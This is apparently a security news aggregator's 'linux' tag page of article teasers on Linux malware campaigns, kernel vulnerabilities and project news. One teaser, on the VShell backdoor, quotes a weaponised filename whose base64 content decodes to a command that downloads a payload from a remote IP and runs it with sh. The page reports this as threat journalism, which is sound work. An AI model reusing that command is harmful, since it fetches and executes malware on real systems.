Tag: linux
-
Happy Birthday Linux! 34 Years of Open-Source Power
August 25, 2025, marks the 34th anniversary of Linux, a project that began as a modest hobby and has grown into the bedrock of modern digital infrastructure. On this day in 1991, 21-year-old Finnish student Linus Torvalds posted to the comp.os.minix newsgroup: “I’m doing a (free) operating system (just a hobby, won’t be big and…
-
Kopia: Open-source encrypted backup tool for Windows, macOS, Linux
Kopia is an open-source backup and restore tool that lets you create encrypted snapshots of your files and store them in cloud storage, on a remote server, on network-attached … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/08/25/kopia-open-source-encrypted-backup-tool-windows-macos-linux/
-
Linux Under Attack: APT36 Launches New Cyber-Espionage Campaign on Indian Govt
The post Linux Under Attack: APT36 Launches New Cyber-Espionage Campaign on Indian Govt appeared first on Daily CyberSecurity. First seen on securityonline.info Jump to article: securityonline.info/linux-under-attack-apt36-launches-new-cyber-espionage-campaign-on-indian-govt/
-
Arch Linux takes a pounding as DDoS attack enters week two
Project scrambles for mitigation as AUR, forums, and main site feel the strain First seen on theregister.com Jump to article: www.theregister.com/2025/08/22/arch_linux_ddos/
-
APT36 hackers abuse Linux .desktop files to install malware in new attacks
The Pakistani APT36 cyberspies are using Linux .desktop files to load malware in new attacks against government and defense entities in India. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/apt36-hackers-abuse-linux-desktop-files-to-install-malware/
-
APT36 hackers abuse Linux .desktop files to install malware
The Pakistani APT36 cyberspies are using Linux .desktop files to load malware in new attacks against government and defense entities in India. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/apt36-hackers-abuse-linux-desktop-files-to-install-malware/
-
Linux Malware Delivered via Malicious RAR Filenames Evades Antivirus Detection
Cybersecurity researchers have shed light on a novel attack chain that employs phishing emails to deliver an open-source backdoor called VShell.The “Linux-specific malware infection chain that starts with a spam email with a malicious RAR archive file,” Trellix researcher Sagar Bade said in a technical write-up.”The payload isn’t hidden inside the file content or a…
-
Stealth Threat Unpacked: Weaponized RAR Files Deliver VShell Backdoor on Linux Systems
Trellix Advanced Research Center has exposed an infection chain that weaponises nothing more than a filename to compromise Linux hosts. A spam message masquerading as a beauty-product survey offers a small reward and carries a RAR archive, yy.rar. When unpacked, the archive drops a single file whose name is a miniature Bash program: ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash The…
-
Hackers deploy DripDropper via Apache ActiveMQ flaw, patch systems to evade detection
Hackers exploit Apache ActiveMQ flaw to install DripDropper on Linux, then patch it to block rivals and hide their tracks. Red Canary researchers observed attackers exploit a 2-year-old Apache ActiveMQ vulnerability, tracked as CVE-2023-46604 (CVSS score of 10.0), to gain persistence on cloud Linux systems and deploy DripDropper malware. Uniquely, they patch the flaw post-exploit…
-
Kali Vagrant Rebuilt Released with Pre-Configured Command-Line VMs
Kali Linux has announced a major overhaul of its Vagrant virtual machine distribution system, transitioning from HashiCorp’s Packer to the DebOS build system for creating pre-configured command-line accessible VMs. This strategic shift unifies Kali’s VM building infrastructure while introducing new compatibility requirements for Windows users running Hyper-V environments. The Kali development team has eliminated the…
-
RingReaper Malware Targets Linux Servers, Stealthily Evading EDR Solutions
A new malware campaign dubbed RingReaper has emerged, targeting servers with advanced post-exploitation capabilities that exploit the kernel’s io_uring asynchronous I/O interface to bypass Endpoint Detection and Response (EDR) systems. This sophisticated agent minimizes reliance on traditional system calls like read, write, recv, send, or connect, instead using io_uring primitives such as io_uring_prep_* for stealthy…
-
Apache ActiveMQ Breach Reveals Unusual Attacker Behavior
Tags: access, apache, breach, cyberattack, exploit, flaw, linux, remote-code-execution, update, vulnerabilitySecurity researchers have confirmed that a recent wave of cyberattacks is exploiting a critical vulnerability in Apache ActiveMQ, allowing attackers to compromise Linux servers and install long-term persistence tools. The attackers are not only gaining access through a known remote code execution flaw but are also patching the vulnerability afterward to cover their tracks. The……
-
New DripDropper Malware Exploits Linux Flaw Then Patches It Lock Rivals Out
A new report from Red Canary reveals a clever Linux malware called DripDropper that exploits a flaw and… First seen on hackread.com Jump to article: hackread.com/dripdropper-malware-exploits-linux-flaw-patche-lock-out/
-
Hackers Exploit Apache ActiveMQ Flaw to Breach Cloud Linux Servers
Tags: access, apache, attack, breach, cloud, cyber, cybersecurity, exploit, flaw, hacker, intelligence, linux, threat, update, vulnerabilityCybersecurity researchers have uncovered a sophisticated attack campaign where hackers exploiting a critical Apache ActiveMQ vulnerability are taking the unusual step of patching the security flaw after gaining access to victim systems. The Red Canary Threat Intelligence team observed this counterintuitive behavior across dozens of compromised cloud-based Linux servers, revealing a strategic approach to maintaining…
-
A Linux alternative? Debian/Hurd shows microkernel Unix dream is alive
Tags: linuxThe official GNU microkernel is still breathing and now it’s 64-bit First seen on theregister.com Jump to article: www.theregister.com/2025/08/18/debian_hurd_13/
-
‘RingReaper’ Sneaks Right Past Linux EDRs
The highly sophisticated post-compromise tool abuses the Linux kernel’s io_uring interface to remain hidden from endpoint detection and response systems. First seen on darkreading.com Jump to article: www.darkreading.com/cyber-risk/ringreaper-sneaks-past-linux-edrs
-
Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems
Threat actors are exploiting a nearly two-year-old security flaw in Apache ActiveMQ to gain persistent access to cloud Linux systems and deploy malware called DripDropper.But in an unusual twist, the unknown attackers have been observed patching the exploited vulnerability after securing initial access to prevent further exploitation by other adversaries and evade detection, Red Canary…
-
‘DripDropper’ Hackers Patch Their Own Exploit
An attacker is breaking into Linux systems via a widely abused 2-year-old vulnerability in Apache ActiveMQ, installing malware and then patching the flaw. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/dripdropper-hackers-patch-own-exploit
-
Attacker “Patches” Vulnerability Post Exploitation to Lock Out Competition
Red Canary observed the novel tactic in a cluster of activity targeting a legacy vulnerability to access cloud-based Linux systems First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/attacker-patches-vulnerability/
-
Lockbit Linux ESXi Ransomware Variant Reveals Evasion Techniques and File Encryption Process
A recent reverse engineering analysis of a Lockbit ransomware variant targeting Linux-based ESXi servers has uncovered several sophisticated evasion techniques and operational details. The malware, first documented in 2022, employs the ptrace system call to detect debugging environments by attempting to attach to its parent process. If this fails typically due to an existing tracer…
-
Linux Kernel Netfilter Flaw Enables Privilege Escalation
A critical vulnerability in the Linux kernel’s netfilter subsystem has been discovered that allows local attackers to escalate privileges through an out-of-bounds write condition. The flaw, identified as CVE-2024-53141, affects the ipset bitmap functionality and could enable unprivileged users to gain root access on vulnerable systems. CVE ID CVE-2024-53141 Affected Versions Up to commit041bd1e4in Torvalds’s Linux…
-
North Korean Hackers’ Secret Linux Malware Surfaces Online
Phrack Magazine’s latest issue #72 has unveiled a significant data leak from a suspected North Korean hacking operation, including exploit tactics, compromised system details, and a sophisticated Linux rootkit. The dump, linked to a Chinese threat actor targeting South Korean and Taiwanese government and private sectors, shows overlaps with the North Korean Kimsuky APT group.…
-
Docker Hub still hosts dozens of Linux images with the XZ backdoor
The XZ-Utils backdoor, first discovered in March 2024, is still present in at least 35 Linux images on Docker Hub, potentially putting users, organizations, and their data at risk. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/docker-hub-still-hosts-dozens-of-linux-images-with-the-xz-backdoor/
-
Gefährliche Malware ‘Auto-Color” – Linux-Backdoor über SAP-Schwachstelle eingeschleust
First seen on security-insider.de Jump to article: www.security-insider.de/cyberangriff-us-chemieunternehmen-linux-backdoor-auto-color-a-dbe36842f5cd2d3bbe44c2e6384f909d/
-
Legitimate System Functions Exploited to Steal Secrets in Shared Linux Setups
Security researcher IonuÈ› Cernica revealed how commonplace Linux utilities can be weaponized to siphon sensitive data in multi-tenant environments. His talk, “Silent Leaks: Harvesting Secrets from Shared Linux Environments,” exposed that without any root privileges or zero-day exploits, attackers can exploit standard tools”, such as ps, /proc, and temporary file handling”, to harvest database credentials, API keys,…
-
BadCam: Linux-based Lenovo webcam bugs enable BadUSB attacks
Lenovo webcam flaws, dubbed BadCam, let attackers turn them into BadUSB devices to inject keystrokes and launch OS-independent attacks. Eclypsium researchers found vulnerabilities in some Lenovo webcams, collectively dubbed BadCam, that could let attackers turn them into BadUSB devices to inject keystrokes and launch OS-independent attacks. Principal security researchers Jesse Michael and Mickey Shkatov demonstrated…
-
Linux-Based Lenovo Webcams’ Flaw Can Be Remotely Exploited for BadUSB Attacks
Cybersecurity researchers have disclosed vulnerabilities in select model webcams from Lenovo that could turn them into BadUSB attack devices.”This allows remote attackers to inject keystrokes covertly and launch attacks independent of the host operating system,” Eclypsium researchers Paul Asadoorian, Mickey Shkatov, and Jesse Michael said in a report shared with The Hacker News.The First seen…
-
Critical Linux Kernel Vulnerability Allows Attackers Gain Full Kernel-Level Control From Chrome Sandbox
August 9, 2025: A severe security vulnerability in the Linux kernel, dubbed CVE-2025-38236, has been uncovered by Google Project Zero researcher Jann Horn, exposing a pathway for attackers ranging from native code execution within the Chrome renderer sandbox to full kernel-level control on Linux systems. The flaw, tied to the obscure MSG_OOB feature in UNIX…